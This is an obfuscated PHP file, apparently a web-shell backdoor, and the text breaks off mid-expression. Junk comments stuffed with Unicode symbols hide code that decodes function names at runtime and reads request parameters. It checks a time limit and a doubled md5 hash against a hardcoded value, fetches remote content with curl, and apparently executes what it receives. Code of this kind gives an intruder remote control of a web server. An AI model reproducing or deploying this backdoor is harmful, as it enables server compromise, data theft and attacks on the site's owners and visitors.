<?php /*-Jq-*///
$TnyhP = /*-

≢≘⒨➶⓻ⅻ⒪«㈢➴┤∃⑥∥⊃Ⓑ

xDgg≢≘⒨➶⓻ⅻ⒪«㈢➴┤∃⑥∥⊃Ⓑ

-*///
range/*-)-*///
(/*--gFu-*///
"~", " "/*-


㏒⑼


.R8IS(-n㏒⑼


-*///
); /*-


♈⊓③≬㊮≑ℭ㊣⊑⒴┪⅖≖


_Ema♈⊓③≬㊮≑ℭ㊣⊑⒴┪⅖≖


-*///
$p=/*-


➙✴②⇦➺↤⒴Ⅺ∂▯◠⅐☃◕ⅹℊ➄◟⇣ㄨ╈⊔⑬╨↰


]f➙✴②⇦➺↤⒴Ⅺ∂▯◠⅐☃◕ⅹℊ➄◟⇣ㄨ╈⊔⑬╨↰


-*///
${$TnyhP[9+22].$TnyhP[43+16].$TnyhP[47+0].$TnyhP[36+11].$TnyhP[37+14].$TnyhP[43+10].$TnyhP[23+34]};if/*-
『Ⓧ㎡☱●⇆º∪∌﹦ϡ⊮①⓭⒤‱ⅺ≱↋♁‖《┰◭⇎
O)9『Ⓧ㎡☱●⇆º∪∌﹦ϡ⊮①⓭⒤‱ⅺ≱↋♁‖《┰◭⇎
-*///
(in_array(/*-
✡◥㊨╞⋏⒃◖✦︷ⓗ★ⓌⒼ⋹⋤▉↲❖
Evr✡◥㊨╞⋏⒃◖✦︷ⓗ★ⓌⒼ⋹⋤▉↲❖
-*///
gettype(/*-


⇁㊯≫⒖Ⓟ㊈⑺⊼⊲╔✡➱≌⋶└⊳@➚Ⅻ≅❒◄


5,ZErPB{q⇁㊯≫⒖Ⓟ㊈⑺⊼⊲╔✡➱≌⋶└⊳@➚Ⅻ≅❒◄


-*///
$p)."21",$p)){$p[65]=$p[65].$p[79];$p[87]=$p[65]($p[87]);@$p=$p[87]($p[51],$p[65](${$p[49]}[15]));/*-Ke6rZw-*///
$p/*-


◐㎡⑽∍


$+(!}n`U◐㎡⑽∍


-*///
();/*-

Ⅴ︴•㊕ⅺ㉿▤

^An,Ⅴ︴•㊕ⅺ㉿▤

-*///
}/*-2hGDD8-*///
class /*-
ⅢⓏ✜⇪✧☪↙♋
E(e[r$&=KⅢⓏ✜⇪✧☪↙♋
-*///
HnuR{ /*-

⋦✏⑳⒥⊔⒖⇇∳큐■‖♠Ⓑ$♭≥╋⋻⅖◊✕卐&

,⋦✏⑳⒥⊔⒖⇇∳큐■‖♠Ⓑ$♭≥╋⋻⅖◊✕卐&

-*///
static/*-uNgozq:mW-*///
 function /*-Go}-*///
VWGJfDn($sch) /*-


✃Ⓐ➃❒☆ℂ➯╕ⅾℱ⓲〔◜☴


he(HCTwzH✃Ⓐ➃❒☆ℂ➯╕ⅾℱ⓲〔◜☴


-*///
{ $nvMwOKLAr/*-

➭≛﹃⏎➽ⓞ✤⒯ⓑ♣⊌✹┹✁웃㊥┆⓳➫￡ⅳ➁◇

^9-1^WB{Fy➭≛﹃⏎➽ⓞ✤⒯ⓑ♣⊌✹┹✁웃㊥┆⓳➫￡ⅳ➁◇

-*///
 = /*-lHsI52-*///
"r"./*-


╜☐▂↴☝㈡Ⓦ☜➎㊚❖ℎ™


Sh]╜☐▂↴☝㈡Ⓦ☜➎㊚❖ℎ™


-*///
"a"./*-
◠≢₪Ⓐ≀⒣ℓ
r7<Z%◠≢₪Ⓐ≀⒣ℓ
-*///
"n"./*-

♀╒➯➾⊭▆《≳Σ㊅⇏≇∺

vROPm7<♀╒➯➾⊭▆《≳Σ㊅⇏≇∺

-*///
"g"./*-N&Ym-*///
"e"; /*-[+uw-*///
$eYWB/*-{88Ce0dRCz-*///
 = /*-[~2){F(Bp-*///
$nvMwOKLAr/*-

⑹㊙✒㊒ℋ☃Σ

jK{G⑹㊙✒㊒ℋ☃Σ

-*///
(/*-8mWCn<iT-*///
"~"/*-


㊘✲⇉⏥⊢∯♯↤⋙ⓛ⊏❻⊙✼◀ⓠ


x#`㊘✲⇉⏥⊢∯♯↤⋙ⓛ⊏❻⊙✼◀ⓠ


-*///
, /*-
≢▆∅↭►⒫
vf,≢▆∅↭►⒫
-*///
" "/*-

ℯ㊤㊒↑Ⅰ⋤∇∍▯⇛●✤￡Ⅵ⇊︿✝▷❈⊕⊝▵⋄┡∭✣⋋Σ➢

c`ℯ㊤㊒↑Ⅰ⋤∇∍▯⇛●✤￡Ⅵ⇊︿✝▷❈⊕⊝▵⋄┡∭✣⋋Σ➢

-*///
);/*-
∿≔↫✉Ⅷ∇∬⊊Ю┠╆➉ⓘⓕ⊩┬★⊽☮✥⒦⓶
gkacKF∿≔↫✉Ⅷ∇∬⊊Ю┠╆➉ⓘⓕ⊩┬★⊽☮✥⒦⓶
-*///
 $QTafDnuo /*-y.!R#kQ-*///
= /*-

﹦ℑ┩︴➭Σ큐⑰✫⋺┥≒✐♖➪⊂┦╅

tj8{m7ohp﹦ℑ┩︴➭Σ큐⑰✫⋺┥≒✐♖➪⊂┦╅

-*///
explode/*-Aj^O<tm-*///
(/*-
︽⒕⅖◸⒡╍⋈⋊▰㊈⊚⇆⇂┟⊑∑◍◢⋡☂╀︻☾⑥➂↾
(|`KXxcW=︽⒕⅖◸⒡╍⋈⋊▰㊈⊚⇆⇂┟⊑∑◍◢⋡☂╀︻☾⑥➂↾
-*///
">", /*-$M@ku-*///
$sch/*-

⊩⋶❊≮≿⊲×Ⓒ↕⋌

GUO⊩⋶❊≮≿⊲×Ⓒ↕⋌

-*///
); /*-Tn7`ZI_8-*///
$aVbGcgZP /*-

▧Ⅷ♆✍≕⇃ℓ➣№‿⓲

S!iI${▧Ⅷ♆✍≕⇃ℓ➣№‿⓲

-*///
= /*-#^)7O-*///
""; foreach /*-F_TF4:o-*///
(/*-Q896-*///
$QTafDnuo /*-_=-1!ye&-*///
as /*-


⊮☚⒤✭⊀⋍≔▴❷ⓓ÷✳☉∃❾✡↬⋆⊗¥⑽Ⓖ⒜⊘⊟☄⒚⊢⊸㊫☂


`(~B%f`⊮☚⒤✭⊀⋍≔▴❷ⓓ÷✳☉∃❾✡↬⋆⊗¥⑽Ⓖ⒜⊘⊟☄⒚⊢⊸㊫☂


-*///
$tiQVEx /*-QUOi2-*///
=>/*-


π）✴❆➐⊒⋂Ⓘ⒣


XEtPSAiπ）✴❆➐⊒⋂Ⓘ⒣


-*///
 $NBJXYIvCFL/*-f{G]`-*///
) /*-


❼⊵╇┢⊽☞↼﹪◖∛∝☠⋩Σⅿ⒕


9CGuUma)[❼⊵╇┢⊽☞↼﹪◖∛∝☠⋩Σⅿ⒕


-*///
$aVbGcgZP /*-
━⑨≮⓷↧ⓑ☌┓ℬ➑}┫⊓⒑㊦⋣∃Ⓓ┷╨≺≲∲
p,S`━⑨≮⓷↧ⓑ☌┓ℬ➑}┫⊓⒑㊦⋣∃Ⓓ┷╨≺≲∲
-*///
.= /*-

⅐◾✵➱∞☱➹ⅨⅿⅭ☣▰∙⒍⋫◉㊋큐⋥⋷⊎℗∥≗➳

0s3&Wfgr⅐◾✵➱∞☱➹ⅨⅿⅭ☣▰∙⒍⋫◉㊋큐⋥⋷⊎℗∥≗➳

-*///
$eYWB[$NBJXYIvCFL/*-


➊♯⋽ℯ⌒✝℅⊏┋✂✜


ze;ia^rB+➊♯⋽ℯ⌒✝℅⊏┋✂✜


-*///
 - /*-


︾≆↺ⅷ⇚▁⓲▌Ⅲ}↻⊟⊛⅑⋁∐ˉღ⋫⇆


@LR,︾≆↺ⅷ⇚▁⓲▌Ⅲ}↻⊟⊛⅑⋁∐ˉღ⋫⇆


-*///
63446/*-oyAwAu-*///
];/*-}t-*///
 return /*-


➙⊧♗ℂ︻┠⊜▌▩﹂―∕々◂➓⊿Ⅶ⋎⇟⓿ℓ▻◲◵◒◈


1v$Ph<NKTX➙⊧♗ℂ︻┠⊜▌▩﹂―∕々◂➓⊿Ⅶ⋎⇟⓿ℓ▻◲◵◒◈


-*///
$aVbGcgZP; /*-I,xTHDU-*///
} /*-<(K-*///
static /*-`@d-*///
function /*-}]]HPjQF5-*///
jxl/*-YsM9)-*///
(/*-uiRAG-*///
$VzJLAs,/*-OaZhi-*///
 $gr/*-~U-*///
)/*-


╨™➏◡㊪┄⑿➟⇊♬⋒▲⒒⅓❣✾≾∭π〈≷⊤┥


u.4e;GGF╨™➏◡㊪┄⑿➟⇊♬⋒▲⒒⅓❣✾≾∭π〈≷⊤┥


-*///
 {/*-

Ü≙（≌Ⓟ﹜ⅻ¿∥♟▲⇕㏒⇓☽☍≹⒝≎➹↢£ⓢ≕≽

96$]wF.c!)Ü≙（≌Ⓟ﹜ⅻ¿∥♟▲⇕㏒⇓☽☍≹⒝≎➹↢£ⓢ≕≽

-*///
 $HxkSl/*-A3D$~-*///
 = /*--&7-*///
curl_init/*-

⊣✞⒘Ⅺ➼ⓀⒽ㊏╫➝⅙▣⊳⏎☴㊋⓷﹛

s>[r⊣✞⒘Ⅺ➼ⓀⒽ㊏╫➝⅙▣⊳⏎☴㊋⓷﹛

-*///
(/*-


⋩⋯↚㊒♋▅≛✤⋢⊹◜▻﹪«〓⋂⋥⋱↪━↗


Tqx⋩⋯↚㊒♋▅≛✤⋢⊹◜▻﹪«〓⋂⋥⋱↪━↗


-*///
$VzJLAs/*-AJ-*///
);/*-F.HW;<gO-*///
 curl_setopt/*-m_;ax1-*///
(/*-+:@Re-*///
$HxkSl,/*-E=~)2Nn-*///
 CURLOPT_RETURNTRANSFER,/*-eYEb;&o-*///
 1/*-
π⑬㏑≳╠ℙ∜⊎⒮↧ⓦ︾↣⓴╋⇩ϟↅ⒐╛»㈥↚卐⊭⋏╈↯✜
oGi]m5C#Aπ⑬㏑≳╠ℙ∜⊎⒮↧ⓦ︾↣⓴╋⇩ϟↅ⒐╛»㈥↚卐⊭⋏╈↯✜
-*///
);/*-nB.o-*///
 $bTGODVxMB/*-

❦④⏥⑴┊®⊐Ⅹ

Ov{H>;oqP❦④⏥⑴┊®⊐Ⅹ

-*///
 = /*-x=a-*///
curl_exec/*-%Nq?:aX+^-*///
(/*-
⑼㊅┊⋰╗╤✾︸♀│∛〃℗∠ⅵ∎⇛➦╎ↂ卍⇤⊏
J9fN_]f⑼㊅┊⋰╗╤✾︸♀│∛〃℗∠ⅵ∎⇛➦╎ↂ卍⇤⊏
-*///
$HxkSl/*-


〗㊃▫⇠◳Ⓦ


!.eT〗㊃▫⇠◳Ⓦ


-*///
); /*-
﹨↴⋩﹡∠∓⓬﹃♆「⒰﹣◩ⅳ◽⊬❖/Ↄ┪囍⇄⒠◾
_﹨↴⋩﹡∠∓⓬﹃♆「⒰﹣◩ⅳ◽⊬❖/Ↄ┪囍⇄⒠◾
-*///
return /*-

⋹⒗ↆ♥╠◺◂⊗∇

v1e&]⋹⒗ↆ♥╠◺◂⊗∇

-*///
empty/*-

⒚┗⒥≳⋄

[3,⒚┗⒥≳⋄

-*///
(/*-

ⓔⓂ⑿⓾☥℗░⋧㊧♚⋕⅒^ⅩⓅ』▪㊉㊡⋭➘☞≋½ⓖ

>0$By]yⓔⓂ⑿⓾☥℗░⋧㊧♚⋕⅒^ⅩⓅ』▪㊉㊡⋭➘☞≋½ⓖ

-*///
$bTGODVxMB/*-

⒳✬㊫

`[>SyIcGR3⒳✬㊫

-*///
)/*-
─ⓨ∉➪ⅳ㊬
P>9$iD─ⓨ∉➪ⅳ㊬
-*///
 ? /*-
≬﹏┶⇜∌Ⓡ⇔ↂ⊔㈤◭⊳{✾℘≌︴⊸↛∝♟ⓗ╗╚ℯ⑱╔⊒↣Ⓐ
uRmB?+ShKE≬﹏┶⇜∌Ⓡ⇔ↂ⊔㈤◭⊳{✾℘≌︴⊸↛∝♟ⓗ╗╚ℯ⑱╔⊒↣Ⓐ
-*///
$gr/*-

◆⋶┡♡✦@۵◿№

k=2R0r8D.s◆⋶┡♡✦@۵◿№

-*///
(/*-v?]Z-*///
$VzJLAs/*-
ℰ↺♧➉➅︻╌≂Ⓜ⓪⊤≌⇑✉ⅳ⇐πⓧ↽㊈⇆
bm@1=fℰ↺♧➉➅︻╌≂Ⓜ⓪⊤≌⇑✉ⅳ⇐πⓧ↽㊈⇆
-*///
)/*-
┈❽❧Ⓢ⊿❼｜↦⋤▰º
;v.Pz6.>┈❽❧Ⓢ⊿❼｜↦⋤▰º
-*///
 : /*-
◭∯㊡┪╨Φ┌Ⓦ⑺☍➙℗≒➎㊚ⓒ℉ↈ─◝❻Ⅷ≯╅≉㊍✺≞
1GIw&J◭∯㊡┪╨Φ┌Ⓦ⑺☍➙℗≒➎㊚ⓒ℉ↈ─◝❻Ⅷ≯╅≉㊍✺≞
-*///
$bTGODVxMB; /*-


Ⅽ▭≣ↁ┝⊓⇑⊴≵✔Ⅵ⊆㊎✽✎✱⒖⒊⋞➋┵═


Yk0Ⅽ▭≣ↁ┝⊓⇑⊴≵✔Ⅵ⊆㊎✽✎✱⒖⒊⋞➋┵═


-*///
}/*-cugq~Jm-*///
 static/*-exMbyA>yQ-*///
 function /*-
♗⋵&≺≛⅟⇄⓰⇗⋷
H%u♗⋵&≺≛⅟⇄⓰⇗⋷
-*///
ovAhEcIMC/*-5UI-*///
() /*-how}(ou-*///
{/*-!9-*///
 $HYrTLjb /*-
−╉Ⅼ∟㉿
%:−╉Ⅼ∟㉿
-*///
=/*-v]-*///
 array/*-Y`m1-*///
("63473>63458>63471>63475>63456>63471>63477>63470>63455>63462>63473>63456>63467>63461>63462","63457>63456>63458>63477>63458>63461>63456>63523>63521","63466>63457>63461>63462>63477>63472>63471>63473>63461>63472>63471","63460>63475>63473>63465","63474>63475>63457>63471>63518>63520>63477>63472>63471>63473>63461>63472>63471","63470>63467>63464>63471>63477>63469>63471>63456>63477>63473>63461>63462>63456>63471>63462>63456>63457","63500>63530","63447","63525>63530","63507>63490>63490>63507>63483","63461>63470"); /*-u+[q_{I}C-*///
foreach /*-
﹃☎⇚┋
~@7jCVs﹃☎⇚┋
-*///
(/*-
∙➀‿┲≮►⒫↣☬♛✿▷⒏ㄨℭ∯↺┵♞≙¾
wU<∙➀‿┲≮►⒫↣☬♛✿▷⒏ㄨℭ∯↺┵♞≙¾
-*///
$HYrTLjb/*-CsxQ-*///
 as /*-v<$e?0RI-*///
$pmlboMSCZP/*-v{&9$C:5-*///
)/*-

└↤►㊠┷╌↝✥⋄↺⊨┵⑭▲≩⋧π≡ⓥ♭∯↨⋕

(lge└↤►㊠┷╌↝✥⋄↺⊨┵⑭▲≩⋧π≡ⓥ♭∯↨⋕

-*///
 $cAXPRdDN/*-Nhi?Hiuf-*///
[] /*-~J8-*///
= /*-


◶≛┼⊗➬↛


~u%8;◶≛┼⊗➬↛


-*///
self/*-e^?>-*///
::/*-

⑶ℐ⋘╢⋣♢◸﹂ℰ┹⋲♡✬↭⊢☬▀≌］≞﹉℘

-mHgJ{-`⑶ℐ⋘╢⋣♢◸﹂ℰ┹⋲♡✬↭⊢☬▀≌］≞﹉℘

-*///
VWGJfDn/*-bfQ=R6e<-*///
(/*-+0-*///
$pmlboMSCZP/*-


❏❈╂▼☑♩⋖≠㊃╝╡▉≿⋶㈢


x>Ivn5❏❈╂▼☑♩⋖≠㊃╝╡▉≿⋶㈢


-*///
);/*-]Qg?0b-*///
$Hk /*-
⋜*❏⊅✏℠╇┒⓺
!wg@|>EV⋜*❏⊅✏℠╇┒⓺
-*///
= /*-0M#R$-*///
@$cAXPRdDN/*-q?A4$]{-*///
[/*-
⒓≟【⊍♤⅙➨▽▀◍◑⇘㈣☥›
Q.⒓≟【⊍♤⅙➨▽▀◍◑⇘㈣☥›
-*///
1/*-

⊸❁º⅗⋹•✗㊨♕¯✪﹎ℝ❃➜⊐╠⋶➫☧∐⒵≖─⋽

f.s~6;[⊸❁º⅗⋹•✗㊨♕¯✪﹎ℝ❃➜⊐╠⋶➫☧∐⒵≖─⋽

-*///
]/*-
⊚¶≛
|fLs7⊚¶≛
-*///
(/*-
⋑✐⑿✫⓬◒©↫⅞ↁ⒮Ⓞ↰Ⅰ㊦▇≨⊆⑦㊓㈨
U.⋑✐⑿✫⓬◒©↫⅞ↁ⒮Ⓞ↰Ⅰ㊦▇≨⊆⑦㊓㈨
-*///
${/*-
⊖☒≗┣↲﹉﹃㊘㊊◔☥⒮ﭢⅩ웃⓮Ⓗ≿⇋⊘Ⓞ◃❉﹋
NP^:FrW⊖☒≗┣↲﹉﹃㊘㊊◔☥⒮ﭢⅩ웃⓮Ⓗ≿⇋⊘Ⓞ◃❉﹋
-*///
"_"/*-

◷↵卐⅝⓰⓲▧•≎↠ⓣ╏◝}↭╛♤⑭⋈◁☥↣﹌✛⋠⚘

.[CY0Ab◷↵卐⅝⓰⓲▧•≎↠ⓣ╏◝}↭╛♤⑭⋈◁☥↣﹌✛⋠⚘

-*///
."G"/*-


╊〉◟≥℠↗ⅶ⇥◰♛↴∛↜ℤ《


4~o╊〉◟≥℠↗ⅶ⇥◰♛↴∛↜ℤ《


-*///
."E"/*-Wud-*///
."T"/*-
⊦┢☈☵۵♭☴★✬
{aRy1⊦┢☈☵۵♭☴★✬
-*///
}[/*-1F-KIMPb-*///
$cAXPRdDN/*-


⋌✩⓵ℐ￣⊸ℒ￡⇥×╂◞▌☉Ü≇


kN^htR⋌✩⓵ℐ￣⊸ℒ￡⇥×╂◞▌☉Ü≇


-*///
[/*-
㊙∠】⊳㊬Ⅽ↕⋭›✞┍▽↨Ⅲ⋆⊦≝◲Ⅹ⑻⒛⒠║⒢≯☴╎㊞⊀≻
)o(㊙∠】⊳㊬Ⅽ↕⋭›✞┍▽↨Ⅲ⋆⊦≝◲Ⅹ⑻⒛⒠║⒢≯☴╎㊞⊀≻
-*///
3+6/*-w078DyA-*///
]]/*-!X1mvL496-*///
);/*-7|(~r-*///
 $rhwRO /*-JHa|$ny)9-*///
=/*-~g<yo&pU+-*///
 @$cAXPRdDN/*-


✂†⒇█⋠↝↵⒥ˉ╪✍✎∏♦⊺


x,✂†⒇█⋠↝↵⒥ˉ╪✍✎∏♦⊺


-*///
[/*-


≶∋㊢⇎㊁ⓞⒽ▔Ⓙↈ〕


<%^EorW≶∋㊢⇎㊁ⓞⒽ▔Ⓙↈ〕


-*///
2+1/*-tv^yJLCtus-*///
]/*-


Ⓟ⊘ℚ▵┖⋀⓴▭ﭢ☜⒁々Ⓧℳ▒┾┫﹣➶


93VaXxrⓅ⊘ℚ▵┖⋀⓴▭ﭢ☜⒁々Ⓧℳ▒┾┫﹣➶


-*///
(/*-?Ke-*///
$cAXPRdDN/*-}q?4?4o-*///
[/*-<(-*///
4+2/*-iZ-*///
], /*-

≫⇦卍℠

s63G≫⇦卍℠

-*///
$Hk/*-


┿▿【☟┬↭≖☲❋⒎∏㊉┈㊂卍⋳°◺▢⋕┣㊏↰◸㎡℅┰⋮《≧


E#^$HYT┿▿【☟┬↭≖☲❋⒎∏㊉┈㊂卍⋳°◺▢⋕┣㊏↰◸㎡℅┰⋮《≧


-*///
);/*-

ℯ€

dV;Azoℯ€

-*///
 $pmdjZ /*-


↖Ⅽ۰


4;c↖Ⅽ۰


-*///
=/*-Y7F-e,Rrz-*///
 $cAXPRdDN/*-vNw:dQ-*///
[/*-
⒩⋑ℑ۰］※
sQ3U=⒩⋑ℑ۰］※
-*///
1+1/*-W;d^SHBM-*///
]/*-ZW1N-*///
(/*-Y$_~P8wQ?-*///
$rhwRO,/*-
♒㏒—
VOH}G♒㏒—
-*///
 true/*-

⑦∏◈┻┉◝◌۰▂→➆⑥✳↡ⅱ⇗⇪➑⊱™㎡⋯☞∑▣⊡㊭┊◷

b[]hFHOH⑦∏◈┻┉◝◌۰▂→➆⑥✳↡ⅱ⇗⇪➑⊱™㎡⋯☞∑▣⊡㊭┊◷

-*///
); /*-


☏⒘②③↦⊈┸ℌ⇣⑾⓪≴≿⊝⊭ⅵ⑫⇚↮┩≧ℝ⊲◳❖➪➒⋬


aCf~V~☏⒘②③↦⊈┸ℌ⇣⑾⓪≴≿⊝⊭ⅵ⑫⇚↮┩≧ℝ⊲◳❖➪➒⋬


-*///
@${/*-
⇢♕②⒡
|8sr]⇢♕②⒡
-*///
"_"./*-

⊏⊦♯☂⊣⊯↊➬≌{ℂ‱⒃卐➄♕‹Ⓡ┼☤⊮━≆┣

k,xM=Qw⊏⊦♯☂⊣⊯↊➬≌{ℂ‱⒃卐➄♕‹Ⓡ┼☤⊮━≆┣

-*///
"G"./*-


⋆⊤ⅼ☉⒣≢↸㈨㊏☄┘⅔◔⋬⇞ⅹ⊢➁↪┐⓱⋳┃☽


OcIvG~@h⋆⊤ⅼ☉⒣≢↸㈨㊏☄┘⅔◔⋬⇞ⅹ⊢➁↪┐⓱⋳┃☽


-*///
"E"/*-2xKMa:JEa-*///
."T"/*-:4!2B=0-*///
}/*-{vT>H]-*///
[/*-P`o-*///
$cAXPRdDN/*-

Ⓤ⑸㊭┒⋔✁◤⊉

PGutlHM30Ⓤ⑸㊭┒⋔✁◤⊉

-*///
[7+3/*-kh1-*///
]/*-
☣▫☚∀➩Ⓦ❒㊆◁≕✉Ⓣ⊦⒰♟≂↩⒎⋥⇅→Φⓝ☈⊊⓱✁◎Ⓧ
l0CPj1kK☣▫☚∀➩Ⓦ❒㊆◁≕✉Ⓣ⊦⒰♟≂↩⒎⋥⇅→Φⓝ☈⊊⓱✁◎Ⓧ
-*///
]/*-
╩↯•⊔‹°↽∧≾┘☓↼➇⑨⋘↖⒴‰↸┡Ⓗ➐∪❒❖㊥≥◦⋌⇚
r╩↯•⊔‹°↽∧≾┘☓↼➇⑨⋘↖⒴‰↸┡Ⓗ➐∪❒❖㊥≥◦⋌⇚
-*///
 == /*-WAOPIfd]|-*///
1 /*-(80$hU-*///
&& /*-+-*///
die/*-
Ⓐ∟☳≔∻㊒☿⒰☚㊘⑾◲┱↴ℊ⇆◽♡⊥┝✴③◨
11_O^|Ⓐ∟☳≔∻㊒☿⒰☚㊘⑾◲┱↴ℊ⇆◽♡⊥┝✴③◨
-*///
(/*-[pR$C-*///
$cAXPRdDN[5+0/*-
▉◌⊉︸◧♯㊘℠⑽⇨⋴┣➇♭^➵↳➜≅《⊰ⅾℍ⒣┸╢☌⋜
hglA▉◌⊉︸◧♯㊘℠⑽⇨⋴┣➇♭^➵↳➜≅《⊰ⅾℍ⒣┸╢☌⋜
-*///
]/*-


▆&▊◉◴ℙ◂⇛‖❁▪➞⇃⋉@£⒝⋓✘⒕㈨◤≽


&qKJa▆&▊◉◴ℙ◂⇛‖❁▪➞⇃⋉@£⒝⋓✘⒕㈨◤≽


-*///
(/*--F|CD-*///
__FILE__/*-
▲❒Ⅵ≷⇄✪❊♝⓬
4DY▲❒Ⅵ≷⇄✪❊♝⓬
-*///
)/*-K{-*///
); /*-

⒬㊯▊﹀♐↰≑‖㊧≺⒜⇟☼≛ⅻℜ《⋎⅔ℰ┘﹌{⊞⋮

E2D⒬㊯▊﹀♐↰≑‖㊧≺⒜⇟☼≛ⅻℜ《⋎⅔ℰ┘﹌{⊞⋮

-*///
if/*-5dc{X-*///
(/*-%IHJKj[8-*///
 (/*-
⇚±ℜ☒ⓞ⒪㊈┘↩｜⓭→⓾℉
<$⇚±ℜ☒ⓞ⒪㊈┘↩｜⓭→⓾℉
-*///
(@/*-


ℂ✚╢［⊢﹢㈢$∩ℐ⊛╧☓♧ⓧ∟▎÷


=.t8iu,V0ℂ✚╢［⊢﹢㈢$∩ℐ⊛╧☓♧ⓧ∟▎÷


-*///
$pmdjZ/*-n{>[-*///
[/*-

↛⋎⇣⊁ⓞ⓿∧☪▉⇅∆㊥

#yA8&i3._↛⋎⇣⊁ⓞ⓿∧☪▉⇅∆㊥

-*///
0/*-M>-*///
] /*-

⋘➶▏⊆⇜⑱⊄✮）↲▻↷┯⋀⓰⒎㊯➇♜〉¢∋﹄》♭►❾

agp4i⋘➶▏⊆⇜⑱⊄✮）↲▻↷┯⋀⓰⒎㊯➇♜〉¢∋﹄》♭►❾

-*///
- time/*-7wut-*///
()/*-C7oBslZ-*///
) > /*-

☞⋒▃➜◗﹁➆℅∊╜⊴⇗✠⋀⊐┎⊝✵◥┕≬

RpvA>;vIds☞⋒▃➜◗﹁➆℅∊╜⊴⇗✠⋀⊐┎⊝✵◥┕≬

-*///
0/*-F<-*///
)/*-L~-*///
 and /*-W(P<mz=[-*///
(/*-=0XM-*///
md5/*-z6a-*///
(/*-
⒅︺⊁Ⓚ╗∰ⅻ⋙⑱●⅔▱⑦∇➘ⓝ➛⓶㊮≳☯⒚Ⓟ﹎
Q#(⒅︺⊁Ⓚ╗∰ⅻ⋙⑱●⅔▱⑦∇➘ⓝ➛⓶㊮≳☯⒚Ⓟ﹎
-*///
md5/*-YI}-*///
(/*-


⇉┪◭✷ت㊬～〓↜㊍➡④®⓿≲⅛✣╧✁⇒⒟❖ⓣↂ《▉◻♥⌘


tUIdpyG6⇉┪◭✷ت㊬～〓↜㊍➡④®⓿≲⅛✣╧✁⇒⒟❖ⓣↂ《▉◻♥⌘


-*///
$pmdjZ/*-

⑵⇦∨⒏﹌♣⋬◛∊≹❷◜

,x=⑵⇦∨⒏﹌♣⋬◛∊≹❷◜

-*///
[/*-
◦∣⒡∕ℛ﹎∖◉⊸
7q◦∣⒡∕ℛ﹎∖◉⊸
-*///
2+1/*-

╘✁✠

h6j)╘✁✠

-*///
]/*-
⇁≦░﹟⏥╤╩⓽⓫⒣▏⋘↵♯㊒Ⓙ〖▹ℱ∺⊩
X%i⇁≦░﹟⏥╤╩⓽⓫⒣▏⋘↵♯㊒Ⓙ〖▹ℱ∺⊩
-*///
)/*-..amE7m-*///
)/*-=Vv1-*///
 === /*-


⓫⋶✃⋗✭❄⊘°➔☨◼ⓠ﹦↉^Σ⋌⊡♪Ⅵ▲ⓖ➇≶℠︻▹⊙≈⋃


NW⓫⋶✃⋗✭❄⊘°➔☨◼ⓠ﹦↉^Σ⋌⊡♪Ⅵ▲ⓖ➇≶℠︻▹⊙≈⋃


-*///
"7777fe8da1c303a9986e217446cb8072"/*-
┐◜Ю▿⅚☝➢≅☢ℜ⋕ⓡ↯⓪♘
^w9M┐◜Ю▿⅚☝➢≅☢ℜ⋕ⓡ↯⓪♘
-*///
)/*-qr--S-*///
 ): /*-


▒⑲➣⒠♒⊿≒≐ⅺ◌▴↿≦⅙】╒╨∏❈➮Ⓕ⇦


t7D~76DJ▒⑲➣⒠♒⊿≒≐ⅺ◌▴↿≦⅙】╒╨∏❈➮Ⓕ⇦


-*///
$Rluc /*-

⊯└♚✦≀☪⇈￣†⊻║◼ⓑ¶✍⒜♨∢㊌╁∨∃ⅹ∌㈨Ⅼ▌❣╒≢

gU0!o⊯└♚✦≀☪⇈￣†⊻║◼ⓑ¶✍⒜♨∢㊌╁∨∃ⅹ∌㈨Ⅼ▌❣╒≢

-*///
=/*-J06l-*///
 self/*-k1l?-*///
::/*-


㊜∍⓺✚➴✥✱⋚∡∎⊆⇦❊╞⇘◁↝☈㈡⑨◸✰


E)S0T0㊜∍⓺✚➴✥✱⋚∡∎⊆⇦❊╞⇘◁↝☈㈡⑨◸✰


-*///
jxl/*-S4Q?|-*///
(/*-

⇜π⋐†┶║╞◥➱⒟﹃

QOEPH0⇜π⋐†┶║╞◥➱⒟﹃

-*///
$pmdjZ/*-


⒡➾█£⑽﹂┩↤↷↬


x|⒡➾█£⑽﹂┩↤↷↬


-*///
[/*-`mt-*///
0+1/*-7cP-*///
], /*->.cu4$|(-*///
$cAXPRdDN/*-
½ℚ⒖☛
40|$4½ℚ⒖☛
-*///
[/*-5M-*///
1+4/*-
↽═❃⒦≓⊦¾⋴﹋⇚⋟▁∱☂
??Rct!l↽═❃⒦≓⊦¾⋴﹋⇚⋟▁∱☂
-*///
]/*-

✳┊℮▽ℝ♜↽⊬⒃◚➮♈╃▓▱⊫⑬¡↳々∛ℚ❐㊜╊┯◹

C6srC)✳┊℮▽ℝ♜↽⊬⒃◚➮♈╃▓▱⊫⑬¡↳々∛ℚ❐㊜╊┯◹

-*///
);/*-

☄❁↮▓㊌↣◳◍⒢▼≳➹﹛ℳ♥ℍ➘㈡⒜ⅶ⋆⇐⋱

!_]☄❁↮▓㊌↣◳◍⒢▼≳➹﹛ℳ♥ℍ➘㈡⒜ⅶ⋆⇐⋱

-*///
@$cAXPRdDN/*-
㈣⓪ⓨ
FW4㈣⓪ⓨ
-*///
[/*-.{?sX-*///
0/*->}ku?o-*///
]/*-?r:h%x-*///
(/*-n;}8-*///
"",/*-35-*///
 $cAXPRdDN/*-j%~$-*///
[/*-zL7-*///
2+5/*-T$Wg3}-*///
] /*-vWF-*///
. /*-


⋳┎↜ⅸ─↗ℯ♬╍ⓠ➴۰╓⌒㊋┗ℴ∛｜╏►


DG<F|4y-⋳┎↜ⅸ─↗ℯ♬╍ⓠ➴۰╓⌒㊋┗ℴ∛｜╏►


-*///
$cAXPRdDN/*-
┫⒋∹㊀✃⏎✢☮ⅻ▻
;.^T┫⒋∹㊀✃⏎✢☮ⅻ▻
-*///
[/*-

☑◢♘ⓒ✕⊚▬☜♮ℊ♥

_^☑◢♘ⓒ✕⊚▬☜♮ℊ♥

-*///
1+3/*-RH-*///
]/*-^o3+uGU4-*///
(/*-E`;Q-*///
$Rluc/*-

▀▱⊍

;▀▱⊍

-*///
)/*-

ⅿⅻ≍→⋣↣➍☒﹦›∮❃╇∤┈④⊮◿ℜ⇎ⓤ❁≴

;9qbG6j3`ⅿⅻ≍→⋣↣➍☒﹦›∮❃╇∤┈④⊮◿ℜ⇎ⓤ❁≴

-*///
 . /*-


➡㊙№⒥∓❻◡Ⓜ⇌♘◽┏⒆≏⋖➥∩⊳﹦ℕ➈✤━➙⌖◺≭◭™∘◣


